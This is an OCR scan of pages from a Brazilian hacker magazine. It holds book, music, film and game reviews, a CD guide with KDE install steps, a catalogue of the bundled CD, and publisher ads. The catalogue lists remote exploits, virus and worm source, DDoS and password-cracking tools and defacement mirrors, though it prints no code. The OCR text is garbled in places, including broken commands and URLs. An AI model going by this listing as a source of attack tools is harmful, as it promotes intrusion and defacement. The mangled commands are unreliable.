disseminação de novas técnicas, com medo de que 
elas possam ser usadas por grupos terroristas em 
ataques contra o pais. No entanto, a grande pres- 
são dos advogados defensores da privacidade e 
do próprio setor privado tem sido importante para 
vencer a opinião dos governantes americanos. 

E Simon Singh aponta para esse caminho. Com 
o crescimento dos ataques de força bruta contra 
os algoritmos, ele afirma: assim como acontece 
com os vírus, precisamos de chaves cada vez mais 
fortes para lidar com o desenvolvimento dos 
“quebradores de códigos”. 


* Simon Singh 
| Editora Record 
| R$48,00 


Punk Rock pra valer! 


Não é preciso nem falar que o cenário punk/hardcore não se limita a bandinhas 
“melódicas” e bobagens como o Blink 182 e nossos compatriotas do “TPM 22”, 
mas grande parte da molecada parece ter se esquecido disso (ou, de repente, 
nunca souberam...). E já que transformaram o Punk/HC em “som de praia” e "for 
fun”, foi preciso trazê-lo de volta para as ruas, de onde nunca deveria ter saído. 
Assim, ganhamos mais um rótulo para coleção: o Street Punk (ou Street Rock, 
como preferem alguns). E é de Boston (EUA) que vem o melhor representante do 
estilo, e, porque não dizer, uma das melhores bandas da cena Punk/HC mundial: 
Dropkick Murphys. Formada em 1996, a banda une com maestria Oi!, Punk Rock 
e Hardcore, dando um molho especial à mistura com boas doses de música irlande- 
sa. O resultado é rock'n'roll para nin- 
guém botar defeito: simples, direto, 
empolgante, bem tocado e com 


muita atitude. É levantar a caneca 
de cerveja e brindar! 


www.dropkickmurphys.com 


Os alienígenas e Will Smith atacam novamente 


Will Smith pode ser o atual queridinho de Hollywood, mas seus filmes variam 
entre o interessante e o descartável. O sucesso da obscura adaptação do quadri- 
nho da editora americana Malibu Comics, comprada pela Marvel, consagrou o ator 
definitivamente e abriu as portas para papéis mais sérios, como a adaptação da 
história de Muhammad Ali, breve lançamento em nossos cinemas. 

Por enquanto, Smith tira proveito da fama e dá uma guinada em sua carreira 
musical, envolvendo-se até o pescoço na continuação de Homens de Preto, um 
filme que não passa de um caça-níqueis descarado e não apresenta muita criatividade 
Segundo os boatos, foi por pouco que Tommy Lee Jones não se recusou a fazer 
esta continuação. No filme anterior, seu personagem tinha se aposentado e muitos 
supunham que o agente K não voltaria mais. 

Mas, agora, encontramos o dito cujo trabalhando numa agência do correio 
americano, sem a mínima 


noção de sua verdadeira 
identidade. J, um recruta no 
filme anterior, passa ao pa- 
pel de veterano e guia de K 
na sua readaptação aos 
MIB. As piadas são boas, mas 
o resultado como um todo 
faz qualquer um temer por 
um terceiro filme para fe- 


char a trilogia. 


Poesia Da Destruição 


WarCraft Ill supera as expectativas 


Um dos primeiros jogos que comprei para PC foi WarCraft Il, logo depois 
de rodar uma demo do primeiro. Aquele negócio de conseguir recursos e 
fazer um exército realmente era bom. Fui orc, fui humano, comprei as ex- 
pansões, joguei até dizer chega. Mesmo hoje, vários anos depois, WarCraft 
continua sensacional. 

WarCraft IIl consegue passar toda a satisfação que o anterior conseguia, e ainda 
aumentá-la. É um jogo absolutamente perfeito. Os gráficos, em glorioso 3D, são 
muito bem feitos, sem ângulos de câmera confusos e desnecessários. A movimen- 
tação é perfeita, sem problemas. 

O som é espetacular, com direito a piadinhas dos personagens. E a jogabilidade, 
então? Jogue fora qualquer game do gênero. WarCraft Ill é simplesmente o me- 
lhor game de estratégia em tempo real. Com quatro raças disponíveis (humanos, 
orcs, zumbis e elfos), humor muito bem utilizado, uma história empolgante e o 
modo multiplayer impecável, ele é a melhor escolha do ano, se não a melhor até 
hoje, quando o assunto é estratégia e ação. 


CriP6O-SdBEDoP ia 


Todo mundo já perce- 
beu que uma das chaves 


INTRODUÇÃO À 
CRIPTOGRAFIA 


(literalmente) mais impor- 
tantes tanto para quem 
quer manter como para 
quem quer acabar com a 
privacidade na Internet é 
a criptografia. Será uma b 


tremenda disputa. E, por 
incrível que pareça, nesta disputa, crackers e 


governos estão do mesmo lado. Os dois querem 
ter a possibilidade de quebrar as transmissões 
seguras e acessar dados em proveito próprio. 

Logo depois dos atentados em Nova lorque, 
Philip Zimmermann, desenvolvedor do PGP (Pretty 
Good Privacy), foi atacado porque, provavelmen- 
te, seu software foi usado por terroristas para 
transmitir mensagens seguras. Até o Washington 
Post, famoso jornal americano, fez uma reporta- 
gem atacando os softwares de segurança. É o 
típico discurso de culpar os meios, e não as pesso- 
as que os usam. 

Bom, esta pequena introdução foi para dar 
uma pincelada sobre a importância do tema de 
Introdução à Criptografia. O autor, Johannes A. 
Buchmann, professor na Universidade de 
Darmstadt, na Alemanha, é considerado um dos 
experts no assunto. Este livro é baseado na expe- 
riência adquirida nestes últimos seis anos, quan- 
do foi o responsável pela cadeira de Criptografia 
na universidade. 

Mas não espere um manual sobre o uso de 
programas de criptografia. O livro trata de 
algoritmos e fundamentos matemáticos da 
criptografia moderna. O objetivo não é só ensi- 
nar técnicas, mas garantir que os usuários da 
criptografia possam avaliar sua eficácia e segu- 
rança. Não é nada fácil, apesar de o professor 
Buchmann garantir que o livro é dirigido para 
aqueles que possuem apenas conhecimentos fun- 
damentais em matemática. Não acredite. 


Introdução à Criptografia 
Johannes A. Buchmann 
Editora Berkeley 

R$ 44,00 
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UIA DO CD 


por Bruno Cesar x 
brunoBdigerati.com.br 


CD HACKER 05 | KDE 


stamos na quinta 

edição da revista 

H4ck3r e, como em 

todas as outras 
edições, procuramos dar des- 
taque ao nosso CD-ROM, por 
ser um meio de oferecer a você 
as mais variadas ferramentas 
voltadas a security, hacking e 
outros utilitários relacionados 
à área de programação, viril, 
exploits, etc. São ao todo 12 
seções, tendo como evidência 
uma completa seleção de 
softwares para Mac Hacking e 
War Driving. Além disso, damos 
destaque à mais nova versão estável do gerenciador de 
janelas, o KDE 3.0.2. 


Dúvidas mais frequentes 

Qualquer dúvida sobre algum programa do CD da revista, 
entre em contato com o e-mail descrito acima deste artigo 
ou com o suporte do próprio programa. Dúvidas técnicas 
são melhor esclarecidas em sites de busca ou no site do 
desenvolvedor. Antes de mais nada, faça uma busca e leia as 
documentações relacionadas à sua dúvida. 


KDE: Muito mais que um gerenciador de janelas 

Hoje, transformar a confiabilidade dos sistemas Unix na 
comodidade de um ambiente gráfico do Windows já é pos- 
sível com o gerenciador de janelas gratuito KDE. Muito mais 
que um simples gerenciador de janelas, o KDE é um ambien- 
te integrado, capaz de administrar, configurar e facilitar o 
uso dos chamados sistemas operacionais de difícil adapta- 


ção. No CD se encontra à disposição o código-fonte da últi- 
ma versão estável deste programa para sistemas operacionais 


rodando Linux. Para maiores informações sobre instalação 
do KDE, consulte os textos de ajuda no site do desenvolvedor 
do software: 

htip:/www.kde. org/documentation/fag/instal html 


Visualizando o CD no Linux: 

Para visualizar corretamente o CD desta edição no Linux, 
faça da seguinte maneira. 

No terminal, como usuário root, digite: 

mkdir (cdrom 

mount -t iso9660 /devicarom lcdrom 


Pronto, seu CD está montado no diretório “cdrom. Para 
acessá-lo, basta entrar no diretório. 

Para desmontar o CD, digite: 

umount fcdrom 


ociosas “Tl cg Voe q 
Heip 


Ele Est Viu oo E Frames Table Tocis 


PrrEE CIR ET SO ES 


Após descompactar todos os 
arquivos de instalação, você irá 
compilá-los. Entre em pasta por 
pasta descompactada de cada 
arquivo, começando pelo Kdelibs, 
e siga os passos abaixo. No 


na a a rojaçã 
Revistas + 


[eee | EETRSES: 


terminal, como usuário root, digite: 


fra CS PSBIUSNNa- 


KDE 3 


K Desktop Environment 


instalação do KDE pode ser dividida assim: 
primeiro pegamos todos os pacotes dos 
códigos-fonte de programas e bibliotecas 
do KDE e depois se compila um por um. 
Isso se a instalação for feita pelos códigos-fonte que 
se encontram no CD desta edição. Antes de tudo, veja 
se seu sistema operacional tem todas as bibliotecas 
requisitadas para a instalação, como o QT library, 
versão 3.0.2. 
htto:liwww.trolitech. com/download 


Se não tiver esse biblioteca instalada, quando você der o 
comando ./configure, vai dar erro. 


Começando a instalação 

Para começar a instalação, descompacte todos os arquivos 
tar.bz2, com o comando: 

Far jxvf. arquivo. tar. bz? 


*./contigure 
Emake 
Amake install 


Deu erro! 

Se ocorrer algum erro na hora 
da compilação dos arquivos, 
provavelmente alguma 
biblioteca está faltando em seu 
sistema. Veja qual é a biblioteca e instale-a. Qualquer dúvida, 
procure o suporte ou o site do desenvolvedor do KDE. 


Usando o KDE 

Se você estiver usando outro gerenciador de janelas e quiser 
passar a usar o KDE, edite o arquivo .xin/trc que se encontra no 
diretório-raiz de cada usuário — por exemplo /home/usuario, se 
for no root /root. Para editar o arquivo .xinitrc, use o vi ou pico: 
ápico .xinitre 


E acrescente a linha abaixo no arquivo: 
execstartkde 


Após isso, salve o arquivo no pico. Utilize o Ctrl + X, confirme 
a criação do arquivo “Y” e dê Enter. 


Links: Atto://mww.kde.org 
htio:/lwww.kde.org/documentation/fag/install. html 
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CATEGORIA 


War Driving 

Programas para rastrear redes sem fio 
vulneráveis. Necessita dos tubos que 
acompanham as batatas Pringles 


Mac Hacking 

Programas e utilitários para hackear o sistema da maçã. Pra quem 
acreditava que os Macintoshes eram totalmente seguros, 
apresentamos algumas ferramentas essenciais 


Network Stumbler 

O programa indispensável para caçar tedes vulneráveis 
Linux Wireless Tools 

Pacote com várias ferramentas para acessar redes sem fio a 
partir de sistemas Linux 


DESTAQUES 


MacPork 

Completo scanner/retriever para encontrar falhas e vulnerabilidades 
em servidores 

PortSniffer 


Um sniffer para portas. Simples, porém eficiente 


“ CATEGORIA 


Exploit 
Todo software, por mais completo e seguro que seja, poderá 
apresentar uma falha. E os culpados por quebrar o sistema e 


explorar essas falhas são os exploits 


Proteção 

Hoje, na Internet, a proteção e a segurança andam lado a lado. Um 
computador seguro é um computador protegido. Veja as principais 
ferramentas para proteger seus dados 


IRX xfsmd.e 

IRIX xfsmd remote root exploit desenvolvido pelo grupo Last Stage 
Of Delirium 

Apache NoseJob 


Remote exploit para servidores Apache rodando em FreeBSD, 


DESTAQUES | 


Panda Antivirus Titanium 2.03 

Antivirus supereficiente que evita contaminações por worms (versão 
shareware) 

Flash Player Updater 


Utilitário que atualiza a versão do Flash Player para a versão sem falhas 


CATEGORIA 


Defacemenis 
Os pichadores virtuais em ação. A arte de alterar páginas na 
Internet está em alta. Confira os últimos ataques dos grupos mais 
atuantes da Internet 


Cracker 

Não poderia faltar uma seção para você, que além de hacker é 
cracker. Sim, os considerados maldosos pela mídia, os destruidores 
de bytes 


BHS owned your Solaris 
Ataque sob um “confiável” servidor Solaris 
EVIL ANGELICA 


Deface satânico! 


[ DESTAQUES | 


VB Worms New Face 

Texto ensinando a melhorar os vírus e worms criados em VB 
Hackman TO Lite 

Software para engenharia reversa de todos os tipos de software 


A fábrica do prazer 
da revista H4CK3R 


Sockets 
A linguagem de programação dedicada à Internet. Softwares de 
muita qualidade que facilitarão a arte de programar para Internet 


Virii 
Uma arma biológica? Muito mais que isso, os virus são arquivos que 
devem ser estudados, pois apresentam uma tecnologia fora do 
comum 


TCPIIP Builder 1.20 

Ferramenta para testar o comportamento de sockets em 
uma rede 

CLISP 2.28 (Linux) 

Para desenvolver sockets a partir de linguagens ANSI e LISP 


Kalamarai 

Vírus com código-fonte completo em arquivo texto 
Shermnar 

Vírus com nome e ícone de instalação do Norton Antivírus. Nada 
mais irônico... 


Sniffers 

O farejamento de informações é uma técnica muito utilizada por 
hackers para capturar dados e informações de um sistema. Veja as 
ferramentas usadas 


Programação 

Para os coders de plantão, uma grande quantidade de ferramentas 
de programação para várias linguagens. Nós damos as ferramentas, 
o resto é com você 


Echelon for Dummies 
Sniffer que usa tecnologia de computação distribuída 
SpyNet v3.00 


Um ótimo network sniffer 


Hex Edit 2.2 

Editor hexadecimal para engenharia reversa 

Jedit 

Supereditor de códigos-fonte, que suporta mais de 70 linguagens. 
Com manual 


MP3 
Músicas de boa qualidade, bla bla bla bla bla bla bla bla bla 


Essenciais 
Programas que não devem faltar em seu computador 


B.U.P 

Mistura de jungle, drum/n bass e techno 
Digital Droo 

Confira o som deste excelente DJ 


WinRAR 3.0br 

Programa para manipular e comprimir arquivos RAR 

ISO Buster 

Para visualizar imagens de distribuições Linux e arquivos ISO em geral 
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Informática, 


Conhecimento. 


Conheça as publicações da Digerati Editorial 


(seek 


A Geek é uma alternativa 
para os interessados em 
nos avanços tecnológicos 
e seus efeitos. 


A PC Linux busca 
desvendar os aspectos 
técnicos deste sistema 
alternativo. 


Linux 


A revista Hacker é porta- 


AVANÇADO INTERMEDIÁRIO JY INICIANTE 


O guia completo, ideal para ) 
profissionais que querem | 
se informar sobre novas 
tecnologias e softwares. 


Publicação ideal para quem 
se envolve diretamente 
com Internet, 
principalmente profissionais. 


A revolução digital chegou 

com dispositivos móveis. 

Para usuários que fazem > 
parte desta revolução. E 


voz e formadora da elite 
hacker em sua busca por A digitalização de sons e 


conhecimento. 


A revista DVD-ROM é a 
primeira a oferecer este 
tipo de mídia, com 9GB 
de informação. 


hs OM 
: ologia e entretenimento 


Com as últimas novida- 
des sobre tecnologia e 
informática para a mulher 
do século XXI. 


imagens revolucionando a 
produção de filmes e 
músicas. 


A educação à distância por 
meio de computadores, 
redes digitais e tecnologia 
de ponta. 


Uma revista feita por 
jogadores para jogadores - 
nada resume melhor o 
espírito da TopGames. 


PS Computador 


o computador para 
facilitar tarofas o 


proporcionar diversão. TI 
i ck Sa ve 


No trabalho e em casa. 
Revista para usuários 
iniciantes e intermediários 
com várias dicas. 


Frete grátis para todo Brasil! Aproveite. 


R$9,90 Edição de colecionador 


Comprar 


Geek 11 
Tudo sobre DVDs, 


Desmonte seus softwares, Peer 
to Peer, Hardware, Modelagem 3D 
R$9,90 VOZ 


Comprar 


Geek 20 
Monte seu próprio sistema 

operacional, crie robôs virtuais, 
R$9,90 aprenda a haquear o Dreamcast 


Comprar 


The WebMasters 1 
Flash, Dreamweaver e programas 
para construção de sites + Cursos 
R$9,90 € dicas de e-Business 


R$9,90 Usar e muito mais 
a sfinio 


Comprar 


Gigi Comprar tie k1 


[8] Office Click: super pacote de 
E AE programas para escritório 
Ê om 90 compatíveis com MS Office “poa R$92.80 administrativos 


Click 7 


Comprar 


nois 4 Ê e Comprar 

Digital Áudio * Vídeo 1 É 
Programas e dicas para usar 
seu micro para processar 

R$9,90 Som e vídeo vil (à + R$9,90 MP3 e muito mais 


ToplrancE 


Comprar 
EMULADORES 


Top Games Surpresa 3 Soap 


500 jogos para Windows! 
Simples e divertidos, incluindo 


R$9,90 grandes clássicos R$9,90 computador. 


Comprar Comprar 


E-Learning 1 
Cursos de softwares, para 


E-Learning 2 


PL HncHeRS Comprar 


Comprar 


PC Brasil 4 

Aprenda a se proteger de hackers, 
transforme seu PC em um estúdio 
R$9,90 digital e muito mais 


PC Brasil 5 


Comer Meu Computador 1 


60 programas completos + 4000 
Cliparts. Software para conversar 
R$9,90 Pela Web e Pacote Office 


Comprar Comprar 


The WebMasters Especial 1 

Tudo sobre Flash. Curso em 

vídeo, Action Script, criação de 
R$9,90 jogos e animações prontas 


Comprar Comprar 


H4CKk3R 1 
Hackerismo, subcultura, software 
livre, segurança e programação 


H4Ck3R 2 


Nome: 


| Endereço: 


] Cidade: Estado: CEP: 


| E-mail ou Telefone: 


| 


fo 


www.digerati.com.br 


Destravamento, Cracks + 
R$9,90 Linguagem C e Cavalos de Tróia 


Geek Especial 4 

Aprenda a montar seu próprio 
computador + CD com coletânea 
R$9,90 especial de programas 


The WebMasters 7 
R$ 430 em softwares. Webdesign, 
programção, scripts prontos para 


Programas especiais para 
gravação de CDs, Softwares 


Digital Áudio « Vídeo 2 
Tudo sobre autoria de DVDs, 
criação de loops, softwares para 


Top Games Surpresa 4 
Emuladores: jogos de videogames 
e arcades para você jogar no: 


- 101 cursos completos e pacote 
vestibulandos, negócios na aid com simulados e apostilas para 
il + poa R$92.80 concursos públicos 


Espionagem virtual, curso 
interativo de Flash MX, Windows 
R$9,90 XP, patches para Office e mais 


Meu Computador 3 
Tudo para gravar CDs de música, 
vídeos e dados - para assistir no 
R$9,90 DVD e ouvir no CD Player 


Como Funciona 1 
Aprenda tudo sobre informática! 
Dissecamos cada peça e 
R$4,90 explicamos para você 


Aprenda a proteger seu Linux e 
saiba tudo sobre Hacktivismo, 
R$9,90 IPs, Fake Mail e Worm Lions 


Selecione as revistas que você deseja receber em casa 


Para uma relação completa de nossas revistas acesse www.digerati.com.br 


Comp! Comprar Comprar 
“E Geek 1 Geek 7 Geek 9 
EI CD-ROM com mais de 50 Hackers! Uma coleção de A arte de gravar CDs: manual e 
programas softwares no CD + Corel Linux, seleção de softwares no CD + 130 


R$9,90 cursos completos 


Comprar 


Geek 19 

Edição histórica: C e C++, criação 
de games, Slackware. No CD: 300 
R$9,90 Softwares 


Comprar 


Geek Especial 9 

Mais de 200 cursos: hacking, 
testes de certificação profissionais 
R$9,90 & programação pesada. 


Comprar 


The WebMasters 8 

E 101 Cursos para especializar-se 
em Internet: Flash, ASP, PHP, 

R$9,90 Dreamweaver, Cold Fusion... 


Portáteis 1 
Internet, wireless, hackers de 
sd No CD, mais de 300 


“Pe pigital Áudio « Vídeo 3 
Grave filmes para DVD player, * 
faça músicas pela Web, crie: 
R$9,90 animações no PC e muito mais 


Comer TonGames Evolution 16 


Games Clássicos! Donkey Kong, 
Bomberman e outros + especial 
R$9,90 Resident Evil e 51 games. 


PR E-Learning 3 

202 Cursos Completos + especial 
idiomas com tradutor inglês, 
R$9,90 francês, espanhol, alemão, italiano 


Comprar 


PC Brasil Especial 1 

200 cursos completos para você: 
design, hardware, programação, 
R$9,90 fedes e muito mais 


Comprar 


Meu Computador 4 
Gravador Digital de conversas 
telefônicas + Software para 
R$9,90 imprimir sem impressora 


Comprar 


DVD-ROM 1 

9 Gigas de programas! Flash, 
Fireworks, Dreamweaver, Linux e 
R$ 19,90 muito mais 


H4Cck3R3 

Tudo sobre sniffers, Unicode Bug, 
scanners de falhas e invasão sem 
R$9,90 Vestígios 


ug 
E 
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CEPRaacaSiaspacocaEncaneano 
Co a a 
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para aprender computação À 
de uma| maneira rápida. || 


Revista Cursos de Informática - R$ 9,90 
nas bancas ou no site www.digerati.com.br 


HACKBR cs 


PARENTAL 


ENPLIGIT GOFIARE 


E 
Aten G | | Esse CD-ROM contém softwares que 
[º “sm Gi m podem danificar computadores. 
Eles foram incluídos nesse CD exclusivamente para 
“estudo e desenvolvimento técnico. Não nos responsabili- 
3 zamos por seu uso indevido. O uso destes softwares para 
prejudicar terceiros é crime, passível de punição. 


C Pentium 233 com 32 MB de 
re de CD com velocidade dupla. Os requisitos podem variar 
| de acordo com o programa, alguns podem não rodar no Windows XP 


O conteúdo do CD-ROM é formado por softwares freeware e 
versões de demonstração 


CONFIRA NO CD: 


Programas que invadem redes wireless e 
tutoriais explicando tudo o que você queria 
saber sobre o assunto 


Mac 

Mais de 20 programas para crackear 
senhas e programas e proteger dados com 
criptografia, tudo em plataforma Mac 


KDE 3.0.2 
Pacote completo com a versão mais recente 
da interface gráfica para Linux 


Socke'ts 

Ferramentas para testar o comportamento 
de sockets, criar sockets em Windows, GTK 
e Mac OS, e também aplicativos para 
serviços on-line 


Mais de 20 vírus de todos os tipos, incluindo 
muitos worms para análise 


Programas para explorar falhas no Apache, 
HIS, servidores Cisco, IBM e Oracle, Yahoo! 
Messenger e muitos outros programas 


Deface ts 

Espelhos de invasões de hackers brasileiros, 
como a do senado.br, e outros exemplos de 
diversos clãs 


a o) 

Ataques DRDoS, worms que desativam 
antivírus, Phreaking, Hijacking, contra- 
ataque ao NetBus, joiners e muito mais 


5 

om atualizações e programas que 
impedem intrusos de invadir o seu compu- 
tador 


Analisadores de pacotes, redes Ethernet, 
programas, arquivos e o Echelon for 
Dummies, que usa tecnologia de computa- 
ção distribuída 


ogi ELrM A ÇÃo (9) 
20 programas para você compilar em 
diversas linguagens: C++, PHP, Assembly, 
Java, Perl, Python e muito mais 


